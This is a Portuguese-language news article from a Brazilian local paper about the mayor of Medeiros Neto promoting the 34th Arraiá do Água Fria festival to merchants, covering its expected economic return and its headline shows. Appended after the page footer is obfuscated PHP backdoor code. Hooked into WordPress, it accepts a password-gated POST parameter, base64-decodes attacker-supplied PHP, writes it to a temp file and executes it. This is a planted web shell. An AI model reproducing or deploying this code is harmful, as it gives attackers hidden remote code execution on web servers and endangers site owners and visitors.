• SEJA BEM-VINDO

Prefeito Beto Pinto apresenta o 34º Arraiá do Água Fria ao comércio local durante evento em parceria com a CDL

Publicado em: 02/06/2022 Atualizado:: junho 2, 2022

 

Na noite desta quarta-feira, 1º de junho, o prefeito Beto Pinto participou de um evento na Câmara dos Dirigentes Lojistas (CDL) de Medeiros Neto, ocasião em que falou com exclusividade sobre a realização do 34º Arraiá do Água Fria e dos benefícios para o comércio local.

 

O evento aconteceu na Primeira Igreja Batista, presidida pelo Pastor Celso Godoy, com o palestrante Patrick Lopes, que trouxe um treinamento sobre “Comunicação em Equipe: como melhorar”.

 

 

O prefeito Beto Pinto agradeceu à CDL de Medeiros Neto, na pessoa do seu presidente Ícaro Neder, pela parceria com a prefeitura em várias ações, sempre visando o benefício do comércio da cidade. “Cumprimento também o presidente da CDL de Teixeira de Freitas, o Sr. José Carlos da Rocha e ao Pastor Godoy, por ter cedido o espaço onde estamos”, disse.

 

De imediato, o gestor municipal trouxe ao público fatos importantes sobre a festa que se aproxima. “Tive a honra de realizar o primeiro Arraiá do Água Fria, e para mim é motivo de muita alegria poder estar aqui novamente proporcionando ao nosso povo essa festa que já virou tradição e é considerada a maior festa Junina do Extremo Sul da Bahia”.

 

 

Beto lembrou das dificuldades enfrentadas nos últimos anos com a pandemia de covid-19 e a enchente recente. “Retornar as festas vai significar dinheiro circulando em nossa cidade. Após dois anos, será possível reverter o impacto na economia, já que a festa junina mobiliza vários seguimentos na economia local. Temos certeza que este será o grande momento da retomada para a nossa cidade.”

 

“Tudo está sendo preparado visando valorizar o que temos em nossa cidade. Desde a decoração, que está sendo feita por mãos de artistas da nossa terra, a reuniões para tratar da segurança, para que todos possam curtir com alegria”, acrescentou Beto.

 

 

Ainda de acordo com o prefeito, a expectativa é de que a cidade receba uma média de 50 mil pessoas, passando pelo circuito da festa. Considerando um consumo mínimo de R$ 90,00 por pessoa, deve haver um retorno de mais de 4,5 milhões de reais, fazendo com que o dinheiro circule.

 

Beto explica que “Quando planejamos o Arraiá do Água Fria, não pensamos somente em fazer a festa. O foco principal era atrair turistas e movimentar Medeiros Neto para que o comércio pudesse aumentar as vendas e os profissionais de diversas áreas tivessem mais oportunidades de trabalho, a exemplo de cabeleireiros, garçons, moto taxistas, cozinheiros, costureiras, barraqueiros e vários outros prestadores de serviço. Hoje, quando vemos hotéis lotados, pessoas alugando suas casas para receber os turistas, as lojas cheias de compradores e muita gente trabalhando, ficamos felizes porque vemos que o nosso objetivo foi alcançado e a cada ano pretendemos melhorar as atrações e a estrutura, para que a cidade ganhe muito mais”.

 

 

A geração de renda é parte fundamental do Arraia do Água Fria 2022. Além de entretenimento, o evento gera empregos e renda para diversos segmentos envolvidos na organização.

 

A Prefeitura de Medeiros Neto prepara equipes que já começaram o cadastramento para a concessão onerosas e não onerosas de barracas e isopores, além da Primeira Feira Solidária, que é um espaço onde será possível expor obras de arte e comidas típicas juninas.

 

“A programação está incrível, e temos certeza que será uma festa maravilhosa”, finalizou o prefeito Beto Pinto.

 

A festa

 

O Arraiá do Água Fria traz atrações de renome nacional para o público de Medeiros Neto e região. Um dos grandes shows confirmados na agenda é da cantora paraense Joelma. A “Rainha do Calypso” faz sua apresentação no dia 19 de junho, trazendo para o palco do forró, na Praça Sete, os maiores sucessos de sua trajetória no cenário musical.

 

Também se apresentam em Medeiros Neto, no 34º Arraiá do Água Fria: Marcynho Sensação (dia 17), e Raí Saia Rodada (18), além de bandas regionais, filhos da terra e o Paredão Revolution G2.

 

Prefeitura Municipal de Medeiros Neto
Nossa gente em primeiro lugar

 

……………………………….

 

Fonte: ASCOM/PMN

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}